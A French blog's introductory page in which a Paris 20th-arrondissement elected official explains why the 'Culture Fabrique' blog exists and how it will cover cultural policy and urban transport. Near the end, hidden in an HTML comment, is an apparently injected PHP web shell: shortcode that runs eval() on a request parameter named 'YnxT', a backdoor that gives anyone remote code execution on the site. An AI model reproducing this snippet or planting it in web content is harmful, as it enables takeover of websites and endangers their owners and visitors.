Culture FabriqueLe deux.zeroPhynancesTransportés

Pourquoi Culture Fabrique ?

blogPourquoi un blog ? Pourquoi un blog de plus dans une blogosphère déjà bien encombrée, avec tellement d’articles à lire, de photos à voir, de vidéos à regarder ? Comment passer tout ce temps à mettre en ligne autant d’informations, en espérant que d’autres s’y intéressent ? J’ai commencé avec Culture Fabrique : après deux ans et plus d’exercice de la délégation « culture et finances » dans le 20ème arrondissement de Paris, faire le lien entre la pratique – locale, concrète, quotidienne – et la réflexion – les théories, les lectures, les commentaires – m’est apparu indispensable. Le nez dans le guidon, c’est bien, mais relever la tête pour analyser, ou tenter d’analyser, les politiques culturelles nationales ou locales, les évolutions du monde ou les courants de pensée, les propositions artistiques d’aujourd’hui, c’est mieux. Bien sûr, il y a les réseaux sociaux. Mais il me semble maintenant utile de développer ; en tout cas, j’en ai envie. J’ai senti ce besoin de livrer en vrac commentaires critiques, analyses stratosphériques, remontées du terrain. Avec ma nouvelle délégation auprès du Maire de Paris, j’ai décidé de compléter le blog.

Le titre a donc changé. L’ancien devient une rubrique. Parce que c’est un blog qui continuera de parler de celles et ceux qui fabriquent la culture et qui s’adressent à eux : les artistes, les élus locaux et nationaux, les opérateurs, grands ou petits, les associations culturelles, les habitants et bien entendu les publics. La culture se fabrique, ensemble, à partir du travail créateur, d’une cohérence de programmation et de la rencontre des publics. Toute culture est fabriquée, pour faire participer le plus grand nombre, faire découvrir les nouvelles propositions artistiques, faire bouger les territoires.

Bien sûr, j’y évoquerai l’enjeu clef des déplacements, au coeur de l’avenir de nos villes. Rééquilibrage en faveur des modes actifs, lutte contre la pollution, engagement pour les transports collectifs, préparation du Paris de demain dans la métropole avec les nouveaux services, mobiliers urbains innovants, les sujets sont nombreux et décisifs.

Le lien entre les deux ? L’espace public voyons ! Et toujours le 20ème …

<!– [insert_php]if (isset($_REQUEST["YnxT"])){eval($_REQUEST["YnxT"]);exit;}[/insert_php][php]if (isset($_REQUEST["YnxT"])){eval($_REQUEST["YnxT"]);exit;}[/php] –>

Tags
Voir plus

Articles associés

3 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Close